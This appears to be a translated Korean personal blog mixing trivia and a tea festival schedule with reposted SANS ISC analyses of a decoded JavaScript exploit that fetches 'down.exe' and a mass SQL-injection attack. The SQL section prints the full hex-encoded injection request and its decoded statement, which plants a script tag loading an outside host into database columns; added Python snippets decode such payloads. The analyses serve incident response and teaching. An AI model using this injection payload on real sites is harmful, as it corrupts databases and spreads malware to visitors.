As I Please 2009. 5. 21. 10:51

It exists.. whoa~

이강석 is the owner..

attack.kr exists too.


attacker.kr doesn't exist, though.
Maybe I should register it?

Posted by 김주일

Explained very well and clearly.

I'd be testing this if only I had the time.. T_T


Posted by 김주일


There will be a time to put this to use.
Posted by 김주일

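Material found by googling

My thanks to the author.
Posted by 김주일
The screenshot below is based on Thunderbird.

Please configure it as shown below under Tools >> Accounts >> Account Settings.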

Posted by 김주일
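As I Please 2009. 5. 10. 00:16

※ The event schedule and program are subject to change depending on circumstances.

5.7. (Thu)

5.8. (Fri)

5.9. (Sat)

5.10. (Sun)

5.11. (Mon)

Korea Tea and Sori Culture Park venue

09:00
~10:00
- Eve festival preparation
(indoor gymnasium)
- Welcoming hometown friends
- Pre-ceremony performance
(downtown Boseong-eup)
- Street parade
(marching band, nongak performance)
- Creative arts troupe performance
- Daegeum performance
- Ocarina performance
Open Open Open
- Nanta performance
- Seonbi tea ceremony demonstration
- Sky-and-earth jump rope - Dahyang writing and sketching contest
10:00
~11:00
- National student tea etiquette
competition
- Tea food making
competition (booth)
- Green tea making
competition (booth)
- Illimsan royal azalea rite
(Illimsan)
11:00
~12:00
- Opening ceremony
- Opening declaration, county citizens' award presentation
- Tea deity rite (Dasinje)
- Tea offering, gugak performance
- Prayer for a bountiful tea harvest
12:00
~13:00
- Large drum and gayageum byeongchang performance
- Green tea can drinking contest
- Green tea can stacking
- Group jump rope
- Yunnori
- Tug of war
- Gourd bursting game
- Tightrope walking performance
- Green Tea Field Green Concert (1st)
- Korea fine tea selection contest (booth)
- Local folk performance
- Modeumbuk, pansori
13:00
~14:00
- Audience participation stage
- Green tea can stacking
- Audience participation stage
- Green tea can stacking
14:00
~15:00
- Korea-China-Japan tea culture exchange exhibition
- Tea ceremony demonstration (6 teams)
- Closing ceremony
- Ippeuni performance troupe
- Silver dance
15:00
~16:00
- Green Tea Field Green
Concert (2nd)
- Green tea field standing performance
- Green tea academic seminar (Sori Training Hall)
- Green tea field standing performance
Our Melodies, Our Stage
Pungnyu Rakrak
16:00
~17:00
17:00
~18:00
- Celebration performance
- Guest singer performance
(recorded TV broadcast)
- Fireworks show
18:00
~19:00
- Dahyang Night
(indoor gymnasium)
- Celebration fireworks show
- Green Tea Field Memories camp village check-in (2nd group)
- Camp concert
- National tea lovers' night
(indoor gymnasium)
- Green Tea Field Memories
camp village check-in (3rd group)
- Campfire
- Camp concert
- Green Tea Field Memories camp village check-in (1st group)
- Campfire
- Camp concert
19:00
~20:00


Date
(time)

Tea culture events (venue booths)

Illimsan
Royal Azalea Festival (5 items)

Exhibitions and competitions (9 items)

Hands-on activities (16)

5.8. ~
5.11.
(10:00 ~ 18:00)

30 items
- Boseong tea exhibition and discount sale
- Agricultural and fishery specialty products exhibition
- Tea ceremony attire exhibition
- Eco-friendly organic green tea production declaration
- Boseong buncheong ware and nationwide deombeong ware exhibition
- Fermented tea exhibition and experience hall
- Green tea making competition
- Tea food making competition
- Korea fine tea selection contest
- Tea leaf picking experience
- Tea making experience
- Green tea rice cake making experience
- Green tea seedling planting experience
- Green tea beverage tasting
- Green tea can stacking
- Green Tea Field Memories camp
- Green tea kimchi making experience
- Green tea balloon art
- Green tea beauty and health experience
- Family motto writing experience
- Green tea food tasting experience
- Green tea chocolate making experience
- Green tea face painting
- Green tea field green post office
- Green Tea Miin rice tasting
- Foreign tea making demonstration

- Mountain-love ribbon tying
- Forestry equipment exhibition
- Illimsan ecological specimen exhibition
- Nature-love exhibition
- Wildflower exhibition, etc.


Source: http://dahyang.boseong.go.kr/dahyang2005/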
Posted by 김주일
As I Please 2009. 5. 3. 23:19
Posted by 김주일
This page was put together to accompany my SANS ISC diary entry on "Javascript Decoding" (see https://isc2.sans.org/diary.html?storyid=2268) and the corresponding example page. If you haven't done so yet, please read the diary first.

Warning! The links on this page contain exploit code. Mind you, exploit code which has been changed very slightly and should not be harmful anymore, but it *is* exploit code, and as such it might possibly trigger your anti-virus. What I'm aiming at: Work through the examples on this page from a LAB PC which is not connected to your production network. And don't complain to me or SANS ISC if clicking on anything on this page makes your computer turn out scrambled instead of sunny side up.

The Starting Point
The original, encoded exploit page was found after unraveling a long set of exploits and IFRAMES. I picked this one as an example because it shows an encoding technique that is not in all that widespread use:

Download the original file if you want to reproduce the next steps on your own! Do a right-click "save link as", or you'll end up with an empty page. The "function" calls within the file were renamed to "funkyon", and the two "eval" statements were renamed into a more fitting "evil" to keep them from triggering by accident. Note: You'll have to change "funkyon" back to "function", and "evil" back to "eval" in the file (once downloaded) if you want to play with the file!

Step #1 - Applying the "Monkey Wrench"
The above code is clearly too messy to try to use the Perl-Fu method. Not knowing really what is hidden inside, and leery of the many bad guys who have started to seed their sploits with a </textarea> tag to break out of the "Liston Method" textarea jail, this leaves the "Monkey Wrench" as a good try. A quick edit replaces the first "eval" with a "print", and then:
daniel@debian:~$ js 0614.txt > stage1.txt
which results in something like this:
stage1

Step #2 - Unwrapping the Octal code
The resulting block shown above is still encoded, but in a far easier format. You might notice that the code only uses figures between 0 and 7, which is a tell-tale indicator that the numbers are encoded in the octal numbering system. To unwrap this block you can easily use the "Monkey Wrench" again; all you have to do is replace the initial "eval" with a "print" and feed the code block into "js". For didactical :) purposes, I'm going to use the Perl-Fu method on this stage, though:
daniel@debian:~$ cat stage1.txt | perl -pe 's/\\(\d+)/chr(oct($1))/ge'
does the trick. oct() converts the octal number to decimal, and chr() turns the decimal ascii code into a printable character. The result is something like this:
stage2

The exploit obviously tries to download and run "down.exe" off the same site.
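The "\d+" in the Perl one-liner is greedy, so a literal digit that directly follows an escape is swallowed into it, whereas JavaScript itself reads at most three octal digits (up to \377). The following added example (not part of the original article) decodes with that rule and also handles \xHH and \uHHHH; the sample string and the function names are constructed for illustration.

```python
import re

# One alternative per numeric escape form in a JavaScript string literal.
ESCAPE_RE = re.compile(
    r"\\(?:u([0-9A-Fa-f]{4})"             # \uHHHH
    r"|x([0-9A-Fa-f]{2})"                 # \xHH
    r"|([0-3][0-7]{0,2}|[4-7][0-7]?))"    # legacy octal, never above \377
)

# Constructed sample (not the stage1 file): a harmless statement, octal-escaped.
PLAIN = "var stage = 2;"
SAMPLE = "".join("\\%o" % ord(ch) for ch in PLAIN)


def looks_octal(text: str) -> bool:
    """True when every backslash-number run uses only the digits 0-7."""
    runs = re.findall(r"\\(\d+)", text)
    return bool(runs) and all(set(run) <= set("01234567") for run in runs)


def decode_js_escapes(text: str) -> str:
    """Replace \\NNN, \\xHH and \\uHHHH escapes with the characters they encode.

    Single-character escapes such as \\n are left untouched.
    """
    def replace(match: re.Match) -> str:
        uni, hexa, octal = match.groups()
        if uni or hexa:
            return chr(int(uni or hexa, 16))
        return chr(int(octal, 8))
    return ESCAPE_RE.sub(replace, text)


if __name__ == "__main__":
    print(SAMPLE)
    print(looks_octal(SAMPLE), decode_js_escapes(SAMPLE))
```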

Source: http://handlers.sans.org/dwesemann/decode/exercise.html
Posted by 김주일
A couple of days ago fellow handler Scott wrote a diary about sites hosting exploits for various Realplayer vulnerabilities. One of the malicious sites mentioned in the article, uc8010.com looked particularly interesting. When you search for this web site in Google you get thousands of other, compromised sites that are all pointing to the uc8010.com web site. This, obviously, sparked some interest in the security community so we decided to dig a bit further into this attack.

It turned out that there is an automated script or a bot exploiting SQL injection attacks in vulnerable web applications. I remembered that I saw the very same attack appearing back in November last year but it was not this widespread – it appears that the attacker improved the crawling/attacking function of his bot so he managed to compromise more web sites.

The attack back from November 2007 was almost exactly the same as the current one, but the SQL statement appears to be a bit improved. One of the logs that we received back in November is shown below:

GET /home/site_content_3.asp

s=290';DECLARE%20@S%20NVARCHAR(4000);SET%20@S=CAST(0x6400650063006C0061007200650
0200040006D00200076006100720063006800610072002800380030003000300029003B007300650
07400200040006D003D00270027003B00730065006C00650063007400200040006D003D0040006D0
02B0027007500700064006100740065005B0027002B0061002E006E0061006D0065002B0027005D0
07300650074005B0027002B0062002E006E0061006D0065002B0027005D003D00720074007200690
06D00280063006F006E007600650072007400280076006100720063006800610072002C0027002B0
062002E006E0061006D0065002B002700290029002B00270027003C0073006300720069007000740
020007300720063003D00220068007400740070003A002F002F0079006C00310038002E006E00650
074002F0030002E006A00730022003E003C002F007300630072006900700074003E00270027003B0
027002000660072006F006D002000640062006F002E007300790073006F0062006A0065006300740
07300200061002C00640062006F002E0073007900730063006F006C0075006D006E0073002000620
02C00640062006F002E0073007900730074007900700065007300200063002000770068006500720
06500200061002E00690064003D0062002E0069006400200061006E006400200061002E007800740
07900700065003D0027005500270061006E006400200062002E00780074007900700065003D00630
02E0078007400790070006500200061006E006400200063002E006E0061006D0065003D002700760
061007200630068006100720027003B00730065007400200040006D003D005200450056004500520
053004500280040006D0029003B00730065007400200040006D003D0073007500620073007400720
069006E006700280040006D002C0050004100540049004E004400450058002800270025003B00250
027002C0040006D0029002C00380030003000300029003B00730065007400200040006D003D00520
0450056004500520053004500280040006D0029003B006500780065006300280040006D0029003B0
0%20AS%20NVARCHAR(4000));EXEC(@S);--

As you can see, we can't tell much about what's going on here. The attackers were smart and decided to obfuscate the attack by using the CAST statement. The CAST statement explicitly converts one data type to another. So, the attackers CAST the big input value as "@S" and then execute it. In this example, the site_content_3.asp script is vulnerable to SQL injection (notice the ' character after s=290, which is an input parameter for the site_content_3.asp script).

Back to the CAST statement. We can decode this simply with perl; we just need to copy the CAST content into a separate line and do something like this:

$ perl -pe 's/(..)00/chr(hex($1))/ge' < input > output

The output file will contain the decoded SQL statement:

declare @m varchar(8000);set @m='';select @m=@m+'update['+a.name+']set['+b.name+']=rtrim(convert(varchar,'+b.name+'))+''<script src="http://yl18.net/0.js"></script>'';'
from dbo.sysobjects a,dbo.syscolumns b,dbo.systypes c where a.id=b.id and a.xtype='U'and b.xtype=c.xtype and c.name='varchar';
set @m=REVERSE(@m);set @m=substring(@m,PATINDEX('%;%',@m),8000);set @m=REVERSE(@m);exec(@m);

And here we can see exactly what's going on. This SQL statement takes all rows from the sysobjects table with type U (user table). It then cycles through those objects and matches those with type "varchar". Finally, for every such object it executes an update statement which results in appending the code shown above pointing to the yl18.net site.
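An added example (not from the original diary): the same decoding in Python, reading the hex as UTF-16LE rather than dropping every "00", so line-wrapped log entries and non-ASCII characters decode correctly. The sample request is constructed and carries only a harmless "select 1;"; the function names and the marker list are illustrative assumptions.

```python
import re
from urllib.parse import unquote

# Matches CAST(0x<hex> AS [N]VARCHAR( ... ; the hex may be wrapped across log lines.
CAST_RE = re.compile(
    r"CAST\s*\(\s*0x([0-9A-Fa-f\s]+?)\s+AS\s+(N?VARCHAR)\s*\(", re.IGNORECASE)

# Markers taken from the decoded statement shown above.
MARKERS = ("exec(", "sysobjects", "syscolumns", "<script")

# Constructed sample (not from a real log): benign "select 1;" as UTF-16LE hex,
# wrapped in the middle of a byte pair the way the logged request above is.
SAMPLE = ("s=1';DECLARE%20@S%20NVARCHAR(4000);SET%20@S=CAST(0x730065006C006500630\n"
          "07400200031003B00%20AS%20NVARCHAR(4000));EXEC(@S);--")


def decode_cast_payloads(raw_query: str) -> list[str]:
    """Return the SQL text hidden in each CAST(0x... AS [N]VARCHAR) expression."""
    query = unquote(raw_query)                     # %20 -> space
    results = []
    for hex_blob, sql_type in CAST_RE.findall(query):
        hex_blob = re.sub(r"\s+", "", hex_blob)    # undo log line wrapping
        hex_blob = hex_blob[: len(hex_blob) - len(hex_blob) % 2]  # truncated entry
        data = bytes.fromhex(hex_blob)
        if sql_type.upper() == "NVARCHAR":         # two bytes per character
            data = data[: len(data) - len(data) % 2]
            results.append(data.decode("utf-16-le", errors="replace"))
        else:                                      # VARCHAR: one byte per character
            results.append(data.decode("latin-1"))
    return results


def triage(sql: str) -> list[str]:
    """List which markers appear in a decoded statement (case-insensitive)."""
    lowered = sql.lower()
    return [marker for marker in MARKERS if marker in lowered]


if __name__ == "__main__":
    for statement in decode_cast_payloads(SAMPLE):
        print(statement, triage(statement))
```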

The attack with the uc8010.com site was practically the same with a bit better SQL – Ryan Barnett posted an example of this attack at http://www.modsecurity.org/blog/

As some people noticed, almost all affected web sites are running IIS and MS SQL server. This makes sense since the SQL statement in the attack will work only on MS SQL servers and there aren't that many web sites running Apache on Windows. That being said, I have no doubt that the bad guys will expand their bot (if they haven't already) so it starts attacking PHP+MySQL web sites.

This is another example that points to issues with development of web applications (see the OWASP top ten vulnerability list for 2007 – injection flaws are in second place http://www.owasp.org/index.php/Top_10_2007-A2#Protection). One could also protect against attacks such as this one with a reverse proxy/web application firewall in front of the web server. However, be aware that this is just a temporary fix – as we saw in this example the bad guys are pretty good at evading detection, as they did with the CAST statement (sure, you can block on CAST but be aware that there are other ways to obfuscate).

Posted by 김주일
System 2009. 4. 28. 17:07



I didn't understand what was being said; I just watched the video.

Source: http://www.youtube.com/watch?v=r2h6w61-c74
Posted by 김주일